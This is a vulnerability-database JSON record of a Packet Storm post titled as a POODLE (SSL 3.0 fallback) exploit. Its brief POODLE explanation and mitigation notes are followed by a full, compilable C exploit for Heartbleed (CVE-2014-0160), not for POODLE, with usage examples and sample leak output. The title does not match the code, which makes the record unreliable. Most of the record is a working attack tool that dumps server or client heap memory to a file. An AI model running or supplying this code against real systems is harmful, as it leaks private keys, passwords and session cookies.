1, "description": "", "reporter": "Bruno Luiz", "published": "2015-06-10T00:00:00", "type": "packetstorm", "title": "This POODLE Bites: Exploiting The SSL 3.0 Fallback", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3566", "CVE-2014-0160"], "modified": "2015-06-10T00:00:00", "href": "https://packetstormsecurity.com/files/132254/This-POODLE-Bites-Exploiting-The-SSL-3.0-Fallback.html", "id": "PACKETSTORM:132254", "sourceData": "`Introduction \n \n \nSSL 3.0 [RFC6101] is an obsolete and insecure protocol. While for most practical \npurposes it has been replaced by its successors TLS 1.0 [RFC2246], TLS 1.1 [RFC4346], \nand TLS 1.2 [RFC5246], many TLS implementations remain backwards\u00adcompatible with \nSSL 3.0 to interoperate with legacy systems in the interest of a smooth user experience. \nThe protocol handshake provides for authenticated version negotiation, so normally the \nlatest protocol version common to the client and the server will be used. \n \n \nThe POODLE Attack \n \n \nTo work with legacy servers, many TLS clients implement a downgrade dance: in a first \nhandshake attempt, offer the highest protocol version supported by the client\u037e if this \nhandshake fails, retry (possibly repeatedly) with earlier protocol versions. Unlike proper \nprotocol version negotiation (if the client offers TLS 1.2, the server may respond with, say, \nTLS 1.0), this downgrade can also be triggered by network glitches, or by active attackers. \nSo if an attacker that controls the network between the client and the server interferes with \nany attempted handshake offering TLS 1.0 or later, such clients will readily confine \nthemselves to SSL 3.0. \n \n \n \nRecommendations \n \n \nThe attack described above requires an SSL 3.0 connection to be established, so \ndisabling the SSL 3.0 protocol in the client or in the server (or both) will completely avoid it. \nIf either side supports only SSL 3.0, then all hope is gone, and a serious update required \nto avoid insecure encryption. If SSL 3.0 is neither disabled nor the only possible protocol \nversion, then the attack is possible if the client uses a downgrade dance for \ninteroperability. \n \n \nImpact \n \n \nThe POODLE attack can be used against any system or application that supports SSL 3.0 with CBC mode ciphers. \nThis affects most current browsers and websites, but also includes any software that either references a vulnerable SSL/TLS \nlibrary (e.g. OpenSSL) or implements the SSL/TLS protocol suite itself. By exploiting this vulnerability in a likely \nweb-based scenario, an attacker can gain access to sensitive data passed within the encrypted web session, such as passwords, \ncookies and other authentication tokens that can then be used to gain more complete access to a website (impersonating that \nuser, accessing database content, etc.). \n \n \nSolution \n \n \nThere is currently no fix for the vulnerability SSL 3.0 itself, as the issue is fundamental to the protocol; however, disabling SSL 3.0 support in system/application configurations is the most viable solution currently available. \n \nSome of the same researchers that discovered the vulnerability also developed a fix for one of the \nrerequisite conditions; TLS_FALLBACK_SCSV is a protocol extension that prevents MITM attackers from \nbeing able to force a protocol downgrade. OpenSSL has added support for TLS_FALLBACK_SCSV to their \nlatest versions and recommend the following upgrades: \n \n- OpenSSL 1.0.1 users should upgrade to 1.0.1j. \n- OpenSSL 1.0.0 users should upgrade to 1.0.0o. \n- OpenSSL 0.9.8 users should upgrade to 0.9.8zc. \n \nBoth clients and servers need to support TLS_FALLBACK_SCSV to prevent downgrade attacks. \n \nOther SSL 3.0 implementations are most likely also affected by POODLE. Contact your vendor for details. Additional vendor information may be available in the National Vulnerability Database (NVD) entry for CVE-2014-3566 or in CERT Vulnerability Note VU#577193.[7] \n \nVulnerable TLS implementations need to be updated. CVE ID assignments and vendor information are also available in the NVD.[8] \n \n \n \nExploit \n \n \n \n/* \n* Heartbleed OpenSSL information leak exploit \n* ========================================================= \n* This exploit uses OpenSSL to create an encrypted connection \n* and trigger the heartbleed leak. The leaked information is \n* returned within encrypted SSL packets and is then decrypted \n* and wrote to a file to annoy IDS/forensics. The exploit can \n* set heartbeat payload length arbitrarily or use two preset \n* values for NULL and MAX length. The vulnerability occurs due \n* to bounds checking not being performed on a heap value which \n* is user supplied and returned to the user as part of DTLS/TLS \n* heartbeat SSL extension. All versions of OpenSSL 1.0.1 to \n* 1.0.1f are known affected. You must run this against a target \n* which is linked to a vulnerable OpenSSL library using DTLS/TLS. \n* This exploit leaks upto 65535 bytes of remote heap each request \n* and can be run in a loop until the connected peer ends connection. \n* The data leaked contains 16 bytes of random padding at the end. \n* The exploit can be used against a connecting client or server, \n* it can also send pre_cmd's to plain-text services to establish \n* an SSL session such as with STARTTLS on SMTP/IMAP/POP3. Clients \n* will often forcefully close the connection during large leak \n* requests so try to lower your payload request size. \n* \n* Compiled on ArchLinux x86_64 gcc 4.8.2 20140206 w/OpenSSL 1.0.1g \n* \n* E.g. \n* $ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed \n* $ ./heartbleed -s 192.168.11.23 -p 443 -f out -t 1 \n* [ heartbleed OpenSSL information leak exploit \n* [ ============================================================= \n* [ connecting to 192.168.11.23 443/tcp \n* [ connected to 192.168.11.23 443/tcp \n* [ <3 <3 <3 heart bleed <3 <3 <3 \n* [ heartbeat returned type=24 length=16408 \n* [ decrypting SSL packet \n* [ heartbleed leaked length=65535 \n* [ final record type=24, length=16384 \n* [ wrote 16381 bytes of heap to file 'out' \n* [ heartbeat returned type=24 length=16408 \n* [ decrypting SSL packet \n* [ final record type=24, length=16384 \n* [ wrote 16384 bytes of heap to file 'out' \n* [ heartbeat returned type=24 length=16408 \n* [ decrypting SSL packet \n* [ final record type=24, length=16384 \n* [ wrote 16384 bytes of heap to file 'out' \n* [ heartbeat returned type=24 length=16408 \n* [ decrypting SSL packet \n* [ final record type=24, length=16384 \n* [ wrote 16384 bytes of heap to file 'out' \n* [ heartbeat returned type=24 length=42 \n* [ decrypting SSL packet \n* [ final record type=24, length=18 \n* [ wrote 18 bytes of heap to file 'out' \n* [ done. \n* $ ls -al out \n* -rwx------ 1 fantastic fantastic 65554 Apr 11 13:53 out \n* $ hexdump -C out \n* - snip - snip \n* \n* Use following example command to generate certificates for clients. \n* \n* $ openssl req -x509 -nodes -days 365 -newkey rsa:2048 \\ \n* -keyout server.key -out server.crt \n* \n* Debian compile with \"gcc heartbleed.c -o heartbleed -Wl,-Bstatic \\ \n* -lssl -Wl,-Bdynamic -lssl3 -lcrypto\" \n* \n* todo: add udp/dtls support. \n* \n* - Beyondtrust \n* http://www.beyondtrust.com \n* \n*/ \n#include <stdio.h> \n#include <stdint.h> \n#include <stdlib.h> \n#include <string.h> \n#include <unistd.h> \n#include <getopt.h> \n#include <signal.h> \n#include <netdb.h> \n#include <fcntl.h> \n#include <sys/socket.h> \n#include <sys/types.h> \n#include <netinet/in.h> \n#include <inttypes.h> \n#include <openssl/bio.h> \n#include <openssl/ssl.h> \n#include <openssl/err.h> \n#include <openssl/evp.h> \n#include <openssl/tls1.h> \n#include <openssl/rand.h> \n#include <openssl/buffer.h> \n \n#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \\ \n(((unsigned int)(c[1])) )),c+=2) \n#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \\ \nc[1]=(unsigned char)(((s) )&0xff)),c+=2) \n \nint first = 0; \nint leakbytes = 0; \nint repeat = 1; \nint badpackets = 0; \n \ntypedef struct { \nint socket; \nSSL *sslHandle; \nSSL_CTX *sslContext; \n} connection; \n \ntypedef struct { \nunsigned char type; \nshort version; \nunsigned int length; \nunsigned char hbtype; \nunsigned int payload_length; \nvoid* payload; \n} heartbeat; \n \nvoid ssl_init(); \nvoid usage(); \nint tcp_connect(char*,int); \nint tcp_bind(char*, int); \nconnection* tls_connect(int); \nconnection* tls_bind(int); \nint pre_cmd(int,int,int); \nvoid* heartbleed(connection* ,unsigned int); \nvoid* sneakyleaky(connection* ,char*, int); \n \nint tcp_connect(char* server,int port){ \nint sd,ret; \nstruct hostent *host; \nstruct sockaddr_in sa; \nhost = gethostbyname(server); \nsd = socket(AF_INET, SOCK_STREAM, 0); \nif(sd==-1){ \nprintf(\"[!] cannot create socket\\n\"); \nexit(0); \n} \nsa.sin_family = AF_INET; \nsa.sin_port = htons(port); \nsa.sin_addr = *((struct in_addr *) host->h_addr); \nbzero(&(sa.sin_zero),8); \nprintf(\"[ connecting to %s %d/tcp\\n\",server,port); \nret = connect(sd,(struct sockaddr *)&sa, sizeof(struct sockaddr)); \nif(ret==0){ \nprintf(\"[ connected to %s %d/tcp\\n\",server,port); \n} \nelse{ \nprintf(\"[!] FATAL: could not connect to %s %d/tcp\\n\",server,port); \nexit(0); \n} \nreturn sd; \n} \n \nint tcp_bind(char* server, int port){ \nint sd, ret, val=1; \nstruct sockaddr_in sin; \nstruct hostent *host; \nhost = gethostbyname(server); \nsd=socket(AF_INET,SOCK_STREAM,0); \nif(sd==-1){ \nprintf(\"[!] cannot create socket\\n\"); \nexit(0); \n} \nmemset(&sin,0,sizeof(sin)); \nsin.sin_addr=*((struct in_addr *) host->h_addr); \nsin.sin_family=AF_INET; \nsin.sin_port=htons(port); \nsetsockopt(sd,SOL_SOCKET,SO_REUSEADDR,&val,sizeof(val)); \nret = bind(sd,(struct sockaddr *)&sin,sizeof(sin)); \nif(ret==-1){ \nprintf(\"[!] cannot bind socket\\n\"); \nexit(0); \n} \nlisten(sd,5); \nreturn(sd); \n} \n \n \nvoid ssl_init(){ \nSSL_load_error_strings(); \nSSL_library_init(); \nOpenSSL_add_all_digests(); \nOpenSSL_add_all_algorithms(); \nOpenSSL_add_all_ciphers(); \n} \n \nconnection* tls_connect(int sd){ \nconnection *c; \nc = malloc(sizeof(connection)); \nif(c==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nc->socket = sd; \nc->sslHandle = NULL; \nc->sslContext = NULL; \nc->sslContext = SSL_CTX_new(SSLv23_client_method()); \nSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3); \nif(c->sslContext==NULL) \nERR_print_errors_fp(stderr); \nc->sslHandle = SSL_new(c->sslContext); \nif(c->sslHandle==NULL) \nERR_print_errors_fp(stderr); \nif(!SSL_set_fd(c->sslHandle,c->socket)) \nERR_print_errors_fp(stderr); \nif(SSL_connect(c->sslHandle)!=1) \nERR_print_errors_fp(stderr); \nif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED || \nc->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){ \nprintf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\"); \n} \nreturn c; \n} \n \nconnection* tls_bind(int sd){ \nint bytes; \nconnection *c; \nchar* buf; \nbuf = malloc(4096); \nif(buf==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nmemset(buf,0,4096); \nc = malloc(sizeof(connection)); \nif(c==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nc->socket = sd; \nc->sslHandle = NULL; \nc->sslContext = NULL; \nc->sslContext = SSL_CTX_new(SSLv23_server_method()); \nif(c->sslContext==NULL) \nERR_print_errors_fp(stderr); \nSSL_CTX_set_options(c->sslContext, SSL_OP_ALL | SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3); \nSSL_CTX_SRP_CTX_init(c->sslContext); \nSSL_CTX_use_certificate_file(c->sslContext, \"./server.crt\", SSL_FILETYPE_PEM); \nSSL_CTX_use_PrivateKey_file(c->sslContext, \"./server.key\", SSL_FILETYPE_PEM); \nif(!SSL_CTX_check_private_key(c->sslContext)){ \nprintf(\"[!] FATAL: private key does not match the certificate public key\\n\"); \nexit(0); \n} \nc->sslHandle = SSL_new(c->sslContext); \nif(c->sslHandle==NULL) \nERR_print_errors_fp(stderr); \nif(!SSL_set_fd(c->sslHandle,c->socket)) \nERR_print_errors_fp(stderr); \nint rc = SSL_accept(c->sslHandle); \nprintf (\"[ SSL connection using %s\\n\", SSL_get_cipher (c->sslHandle)); \nbytes = SSL_read(c->sslHandle, buf, 4095); \nprintf(\"[ recieved: %d bytes - showing output\\n%s\\n[\\n\",bytes,buf); \nif(!c->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED || \nc->sslHandle->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS){ \nprintf(\"[ warning: heartbeat extension is unsupported (try anyway)\\n\"); \n} \nreturn c; \n} \n \nint pre_cmd(int sd,int precmd,int verbose){ \n/* this function can be used to send commands to a plain-text \nservice or client before heartbleed exploit attempt. e.g. STARTTLS */ \nint rc, go = 0; \nchar* buffer; \nchar* line1; \nchar* line2; \nswitch(precmd){ \ncase 0: \nline1 = \"EHLO test\\n\"; \nline2 = \"STARTTLS\\n\"; \nbreak; \ncase 1: \nline1 = \"CAPA\\n\"; \nline2 = \"STLS\\n\"; \nbreak; \ncase 2: \nline1 = \"a001 CAPB\\n\"; \nline2 = \"a002 STARTTLS\\n\"; \nbreak; \ndefault: \ngo = 1; \nbreak; \n} \nif(go==0){ \nbuffer = malloc(2049); \nif(buffer==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nmemset(buffer,0,2049); \nrc = read(sd,buffer,2048); \nprintf(\"[ banner: %s\",buffer); \nsend(sd,line1,strlen(line1),0); \nmemset(buffer,0,2049); \nrc = read(sd,buffer,2048); \nif(verbose==1){ \nprintf(\"%s\\n\",buffer); \n} \nsend(sd,line2,strlen(line2),0); \nmemset(buffer,0,2049); \nrc = read(sd,buffer,2048); \nif(verbose==1){ \nprintf(\"%s\\n\",buffer); \n} \n} \nreturn sd; \n} \n \nvoid* heartbleed(connection *c,unsigned int type){ \nunsigned char *buf, *p; \nint ret; \nbuf = OPENSSL_malloc(1 + 2); \nif(buf==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \np = buf; \n*p++ = TLS1_HB_REQUEST; \nswitch(type){ \ncase 0: \ns2n(0x0,p); \nbreak; \ncase 1: \ns2n(0xffff,p); \nbreak; \ndefault: \nprintf(\"[ setting heartbeat payload_length to %u\\n\",type); \ns2n(type,p); \nbreak; \n} \nprintf(\"[ <3 <3 <3 heart bleed <3 <3 <3\\n\"); \nret = ssl3_write_bytes(c->sslHandle, TLS1_RT_HEARTBEAT, buf, 3); \nOPENSSL_free(buf); \nreturn c; \n} \n \nvoid* sneakyleaky(connection *c,char* filename, int verbose){ \nchar *p; \nint ssl_major,ssl_minor,al; \nint enc_err,n,i; \nSSL3_RECORD *rr; \nSSL_SESSION *sess; \nSSL* s; \nunsigned char md[EVP_MAX_MD_SIZE]; \nshort version; \nunsigned mac_size, orig_len; \nsize_t extra; \nrr= &(c->sslHandle->s3->rrec); \nsess=c->sslHandle->session; \ns = c->sslHandle; \nif (c->sslHandle->options & SSL_OP_MICROSOFT_BIG_SSLV3_BUFFER) \nextra=SSL3_RT_MAX_EXTRA; \nelse \nextra=0; \nif ((s->rstate != SSL_ST_READ_BODY) || \n(s->packet_length < SSL3_RT_HEADER_LENGTH)) { \nn=ssl3_read_n(s, SSL3_RT_HEADER_LENGTH, s->s3->rbuf.len, 0); \nif (n <= 0) \ngoto apple; \ns->rstate=SSL_ST_READ_BODY; \np=s->packet; \nrr->type= *(p++); \nssl_major= *(p++); \nssl_minor= *(p++); \nversion=(ssl_major<<8)|ssl_minor; \nn2s(p,rr->length); \nif(rr->type==24){ \nprintf(\"[ heartbeat returned type=%d length=%u\\n\",rr->type, rr->length); \nif(rr->length > 16834){ \nprintf(\"[ error: got a malformed TLS length.\\n\"); \nexit(0); \n} \n} \nelse{ \nprintf(\"[ incorrect record type=%d length=%u returned\\n\",rr->type,rr->length); \ns->packet_length=0; \nbadpackets++; \nif(badpackets > 3){ \nprintf(\"[ error: too many bad packets recieved\\n\"); \nexit(0); \n} \ngoto apple; \n} \n} \nif (rr->length > s->packet_length-SSL3_RT_HEADER_LENGTH){ \ni=rr->length; \nn=ssl3_read_n(s,i,i,1); \nif (n <= 0) goto apple; \n} \nprintf(\"[ decrypting SSL packet\\n\"); \ns->rstate=SSL_ST_READ_HEADER; \nrr->input= &(s->packet[SSL3_RT_HEADER_LENGTH]); \nrr->data=rr->input; \ntls1_enc(s,0); \nif((sess != NULL) && \n(s->enc_read_ctx != NULL) && \n(EVP_MD_CTX_md(s->read_hash) != NULL)) \n{ \nunsigned char *mac = NULL; \nunsigned char mac_tmp[EVP_MAX_MD_SIZE]; \nmac_size=EVP_MD_CTX_size(s->read_hash); \nOPENSSL_assert(mac_size <= EVP_MAX_MD_SIZE); \norig_len = rr->length+((unsigned int)rr->type>>8); \nif(orig_len < mac_size || \n(EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE && \norig_len < mac_size+1)){ \nal=SSL_AD_DECODE_ERROR; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_LENGTH_TOO_SHORT); \n} \nif (EVP_CIPHER_CTX_mode(s->enc_read_ctx) == EVP_CIPH_CBC_MODE){ \nmac = mac_tmp; \nssl3_cbc_copy_mac(mac_tmp, rr, mac_size, orig_len); \nrr->length -= mac_size; \n} \nelse{ \nrr->length -= mac_size; \nmac = &rr->data[rr->length]; \n} \ni = tls1_mac(s,md,0); \nif (i < 0 || mac == NULL || CRYPTO_memcmp(md, mac, (size_t)mac_size) != 0) \nenc_err = -1; \nif (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra+mac_size) \nenc_err = -1; \n} \nif(enc_err < 0){ \nal=SSL_AD_BAD_RECORD_MAC; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DECRYPTION_FAILED_OR_BAD_RECORD_MAC); \ngoto apple; \n} \nif(s->expand != NULL){ \nif (rr->length > SSL3_RT_MAX_COMPRESSED_LENGTH+extra) { \nal=SSL_AD_RECORD_OVERFLOW; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_COMPRESSED_LENGTH_TOO_LONG); \ngoto apple; \n} \nif (!ssl3_do_uncompress(s)) { \nal=SSL_AD_DECOMPRESSION_FAILURE; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_BAD_DECOMPRESSION); \ngoto apple; \n} \n} \nif (rr->length > SSL3_RT_MAX_PLAIN_LENGTH+extra) { \nal=SSL_AD_RECORD_OVERFLOW; \nSSLerr(SSL_F_SSL3_GET_RECORD,SSL_R_DATA_LENGTH_TOO_LONG); \ngoto apple; \n} \nrr->off=0; \ns->packet_length=0; \nif(first==0){ \nuint heartbleed_len = 0; \nchar* fp = s->s3->rrec.data; \n(long)fp++; \nmemcpy(&heartbleed_len,fp,2); \nheartbleed_len = (heartbleed_len & 0xff) << 8 | (heartbleed_len & 0xff00) >> 8; \nfirst = 2; \nleakbytes = heartbleed_len + 16; \nprintf(\"[ heartbleed leaked length=%u\\n\",heartbleed_len); \n} \nif(verbose==1){ \n{ unsigned int z; for (z=0; z<rr->length; z++) printf(\"%02X%c\",rr->data[z],((z+1)%16)?' ':'\\n'); } \nprintf(\"\\n\"); \n} \nleakbytes-=rr->length; \nif(leakbytes > 0){ \nrepeat = 1; \n} \nelse{ \nrepeat = 0; \n} \nprintf(\"[ final record type=%d, length=%u\\n\", rr->type, rr->length); \nint output = s->s3->rrec.length-3; \nif(output > 0){ \nint fd = open(filename,O_RDWR|O_CREAT|O_APPEND,0700); \nif(first==2){ \nfirst--; \nwrite(fd,s->s3->rrec.data+3,s->s3->rrec.length); \n/* first three bytes are resp+len */ \nprintf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length-3,filename); \n} \nelse{ \n/* heap data & 16 bytes padding */ \nwrite(fd,s->s3->rrec.data+3,s->s3->rrec.length); \nprintf(\"[ wrote %d bytes of heap to file '%s'\\n\",s->s3->rrec.length,filename); \n} \nclose(fd); \n} \nelse{ \nprintf(\"[ nothing from the heap to write\\n\"); \n} \nreturn; \napple: \nprintf(\"[ problem handling SSL record packet - wrong type?\\n\"); \nbadpackets++; \nif(badpackets > 3){ \nprintf(\"[ error: too many bad packets recieved\\n\"); \nexit(0); \n} \nreturn; \n} \n \nvoid usage(){ \nprintf(\"[\\n\"); \nprintf(\"[ --server|-s <ip/dns> - the server to target\\n\"); \nprintf(\"[ --port|-p <port> - the port to target\\n\"); \nprintf(\"[ --file|-f <filename> - file to write data to\\n\"); \nprintf(\"[ --bind|-b <ip> - bind to ip for exploiting clients\\n\"); \nprintf(\"[ --precmd|-c <n> - send precmd buffer (STARTTLS)\\n\"); \nprintf(\"[ 0 = SMTP\\n\"); \nprintf(\"[ 1 = POP3\\n\"); \nprintf(\"[ 2 = IMAP\\n\"); \nprintf(\"[ --loop|-l - loop the exploit attempts\\n\"); \nprintf(\"[ --type|-t <n> - select exploit to try\\n\"); \nprintf(\"[ 0 = null length\\n\"); \nprintf(\"[ 1 = max leak\\n\"); \nprintf(\"[ n = heartbeat payload_length\\n\"); \nprintf(\"[\\n\"); \nprintf(\"[ --verbose|-v - output leak to screen\\n\"); \nprintf(\"[ --help|-h - this output\\n\"); \nprintf(\"[\\n\"); \nexit(0); \n} \n \nint main(int argc, char* argv[]){ \nint ret, port, userc, index; \nint type = 1, udp = 0, verbose = 0, bind = 0, precmd = 9; \nint loop = 0; \nstruct hostent *h; \nconnection* c; \nchar *host, *file; \nint ihost = 0, iport = 0, ifile = 0, itype = 0, iprecmd = 0; \nprintf(\"[ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit\\n\"); \nprintf(\"[ =============================================================\\n\"); \nstatic struct option options[] = { \n{\"server\", 1, 0, 's'}, \n{\"port\", 1, 0, 'p'}, \n{\"file\", 1, 0, 'f'}, \n{\"type\", 1, 0, 't'}, \n{\"bind\", 1, 0, 'b'}, \n{\"verbose\", 0, 0, 'v'}, \n{\"precmd\", 1, 0, 'c'}, \n{\"loop\", 0, 0, 'l'}, \n{\"help\", 0, 0,'h'} \n}; \nwhile(userc != -1) { \nuserc = getopt_long(argc,argv,\"s:p:f:t:b:c:lvh\",options,&index); \nswitch(userc) { \ncase -1: \nbreak; \ncase 's': \nif(ihost==0){ \nihost = 1; \nh = gethostbyname(optarg); \nif(h==NULL){ \nprintf(\"[!] FATAL: unknown host '%s'\\n\",optarg); \nexit(1); \n} \nhost = malloc(strlen(optarg) + 1); \nif(host==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nsprintf(host,\"%s\",optarg); \n} \nbreak; \ncase 'p': \nif(iport==0){ \nport = atoi(optarg); \niport = 1; \n} \nbreak; \ncase 'f': \nif(ifile==0){ \nfile = malloc(strlen(optarg) + 1); \nif(file==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nsprintf(file,\"%s\",optarg); \nifile = 1; \n} \nbreak; \ncase 't': \nif(itype==0){ \ntype = atoi(optarg); \nitype = 1; \n} \nbreak; \ncase 'h': \nusage(); \nbreak; \ncase 'b': \nif(ihost==0){ \nihost = 1; \nhost = malloc(strlen(optarg)+1); \nif(host==NULL){ \nprintf(\"[ error in malloc()\\n\"); \nexit(0); \n} \nsprintf(host,\"%s\",optarg); \nbind = 1; \n} \nbreak; \ncase 'c': \nif(iprecmd == 0){ \niprecmd = 1; \nprecmd = atoi(optarg); \n} \nbreak; \ncase 'v': \nverbose = 1; \nbreak; \ncase 'l': \nloop = 1; \nbreak; \ndefault: \nbreak; \n} \n} \nif(ihost==0||iport==0||ifile==0||itype==0||type < 0){ \nprintf(\"[ try --help\\n\"); \nexit(0); \n} \nssl_init(); \nif(bind==0){ \nret = tcp_connect(host, port); \npre_cmd(ret, precmd, verbose); \nc = tls_connect(ret); \nheartbleed(c,type); \nwhile(repeat==1){ \nsneakyleaky(c,file,verbose); \n} \nwhile(loop==1){ \nprintf(\"[ entered heartbleed loop\\n\"); \nfirst=0; \nrepeat=1; \nheartbleed(c,type); \nwhile(repeat==1){ \nsneakyleaky(c,file,verbose); \n} \n} \nprintf(\"[ done.\\n\"); \nexit(0); \n} \nelse{ \nint sd, pid, i; \nret = tcp_bind(host, port); \nwhile(1){ \nsd=accept(ret,0,0); \nif(sd==-1){ \nprintf(\"[!] FATAL: problem with accept()\\n\"); \nexit(0); \n} \nif(pid=fork()){ \nclose(sd); \n} \nelse{ \nc = tls_bind(sd); \npre_cmd(ret, precmd, verbose); \nheartbleed(c,type); \nwhile(repeat==1){ \nsneakyleaky(c,file,verbose); \n} \nwhile(loop==1){ \nprintf(\"[ entered heartbleed loop\\n\"); \nfirst=0; \nrepeat=0; \nheartbleed(c,type); \nwhile(repeat==1){ \nsneakyleaky(c,file,verbose); \n} \n} \nprintf(\"[ done.\\n\"); \nexit(0); \n} \n} \n} \n} \n \n \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/132254/poodle-poc.txt"}]}